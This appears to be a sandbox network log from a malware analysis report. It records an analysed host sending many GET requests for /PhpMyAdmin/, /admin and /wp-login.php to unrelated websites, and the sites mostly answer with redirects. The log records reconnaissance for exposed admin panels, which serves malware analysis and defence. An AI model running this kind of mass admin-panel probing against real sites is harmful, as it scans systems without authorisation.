                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.497370958 CET485INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.google.com/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.497426033 CET184INData Raw: 1f 8b 08 00 00 00 00 00 00 ff 6d 8f c1 0a 83 30 10 44 ef 7e 45 48 ef a6 bd 96 18 48 6b ac 05 c5 22 39 b4 47 89 8b 11 8c 11 8d 05 ff be 31 ed b1 73 59 76 76 18 de d2 5c 96 05 8b 68 2e 78 ea 87 bc cb 42 b0 d2 be a1 45 12 cc 64 e7 66 ee 87 8d 92 ef
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: m0D~EHHk"9G1sYvv\h.xBEdf!T]n xJ{Hj@U!,(E`i VffX2|


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                504192.168.2.66536044.199.96.17980
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.370903015 CET182OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pxndx-mcr.boletia.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.487854958 CET401INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 185
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.12.2
                                                                                                                                                                                                                                                                                                                                                                Location: https://pxndx-mcr.boletia.com/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                505192.168.2.665373104.26.14.18080
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.370970964 CET186OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: aeaaamorim.inovarmais.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.502578020 CET664INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://aeaaamorim.inovarmais.com/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6fbCjTjbhiLbzZVL6japWFd9kbj0XLXwfBIlPCuaYhndBzSQrhK5X5af5TXkjh%2BV6%2BDTex3BbxpJ%2BaYHlY4jIk7ATLuhP2gxZE1yBJqTZ7wdN8y7RSfJQJyPVZIUDZM3RauTvwXXSJL6MJQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd636eac7bac-ATL
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                506192.168.2.665362172.67.170.14780
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.371175051 CET182OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: poligrafosecuador.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.645396948 CET824INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://poligrafosecuador.com/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QKZjL9%2Bo1fm8j2Q467gzwjuN8IW%2BvQMYJiW7Jh2gJRoJ0hnD4qnAtc63Tn0hIU6SvBd7L2Zv386X7Gex%2Fkn6RULhnFxnEEryd38jv9YbN0Ofpywkuh967KkaZhzcJQ2fuQjJ7HWlegU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd636a02b056-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 62 32 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: b2<html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.14.2</center></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.645427942 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                507192.168.2.665363172.66.43.11780
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.371241093 CET167OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: login.adf.ly
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.530622005 CET1286INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                location: http://login.adf.ly/admin/
                                                                                                                                                                                                                                                                                                                                                                x-turbo-charged-by: LiteSpeed
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=L0%2FnFs3ILXk057h2djqVRwCSOvuJf9VFgYyleIELgSq0uJpcXpNyUepAvQb2TJZXvDsyZdnpo6JaK5CydhzypWXvFfFciHhf16gzn5WxgW4m6iymXWr80FmLiQe5Uys%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd636d39244d-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 32 63 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 2c3<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The do
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.530635118 CET68INData Raw: 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: cument has been permanently moved.</p></div></div></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.530644894 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.629961967 CET168OUTGET /admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: login.adf.ly
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.777275085 CET1286INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                                                                                                                                                                                                location: https://login.adf.ly/admin/
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                x-turbo-charged-by: LiteSpeed
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6WF5GURww7h4xFLoSIdxFOmi8OhJctP7OI%2Bs%2Fh%2BAnf4DmUncfL9gX0POEgOITgboAMyzJC%2BMN9Z9eyjKu5fe8a9Vn61KQ4HmhkLOt%2BKhI81uACtPHcqD4HR7MfKvyhE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd650eae244d-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 32 61 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 32 3c 2f 68 31 3e 0a 3c 68
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 2ab<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.777287006 CET133INData Raw: 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.777297020 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                508192.168.2.665366172.66.40.8880
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.371306896 CET176OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: warriorplus.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.662486076 CET1140INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://warriorplus.com:443/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GS6ZW39QYrOgdjPhTB3viDMZmWgqEhkXhgnDwzQKSRlOXc6FgBNbebTvgzPmJ0u03H%2F2xMzj5SQnSSinbfIzN7Y%2FbpTWhI3GJDWWufNGLp5QiZZgh%2FZiDOCxfnIOK%2BU4eg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd636eac6737-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 31 66 33 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 73 63 72 69 70 74 20 64 65 66 65 72 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 63 6c 6f 75 64 66 6c 61 72 65 69 6e 73 69 67 68 74 73 2e 63 6f 6d 2f 62 65 61 63 6f 6e 2e 6d 69 6e 2e 6a 73 2f 76 38 34 61 33 61 34 30 31 32 64 65 39 34 63 65 31 61 36 38 36 62 61 38 63 31 36 37 63 33 35 39 63 31 36 39 36 39 37 33 38 39 33 33 31 37 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 65 75 6f 46 47 6f 77 68 6c 61 4c 71 58 73 50 57 51 34 38 71 53 6b 42 53 43 46 73 33 44 50 52 79 69 77 56 75 33 46 6a 52 39 36 63 4d 50 78 2b 46 72 2b 67 70 57 52 68 49 61 66 63 48 77 71 77 43 71 57 53 34 32 52 5a 68 49 75 64 4f 76 45 49 2b 43 6b 66 36 4d 41 3d 3d 22 20 64 61 74 61 2d 63 66 2d 62 65 61 63 6f 6e 3d 27 7b 22 72 61 79 49 64 22 3a 22 38 35 30 61 62 64 36 33 36 65 61 63 36 37 33 37 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 32 30 32 34 2e 32 2e 30 22 2c 22 74 6f 6b 65 6e 22 3a 22 35 39 31 35 39 62 35 66 36 62 63 63 34 38 64 31 62 34 32 39 35 62 34 62 61 34 65 64 33 62 30 63 22 7d 27 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 1f3<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><script defer src="https://static.cloudflareinsights.com/beacon.min.js/v84a3a4012de94ce1a686ba8c167c359c1696973893317" integrity="sha512-euoFGowhlaLqXsPWQ48qSkBSCFs3DPRyiwVu3FjR96cMPx+Fr+gpWRhIafcHwqwCqWS42RZhIudOvEI+Ckf6MA==" data-cf-beacon='{"rayId":"850abd636eac6737","version":"2024.2.0","token":"59159b5f6bcc48d1b4295b4ba4ed3b0c"}' crossorigin="anonymous"></script></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.662516117 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                509192.168.2.66537831.13.65.180
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.371380091 CET178OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: web.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.473507881 CET212INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Location: https://web.facebook.com/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                Server: proxygen-bolt
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                510192.168.2.66535164.190.63.13680
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
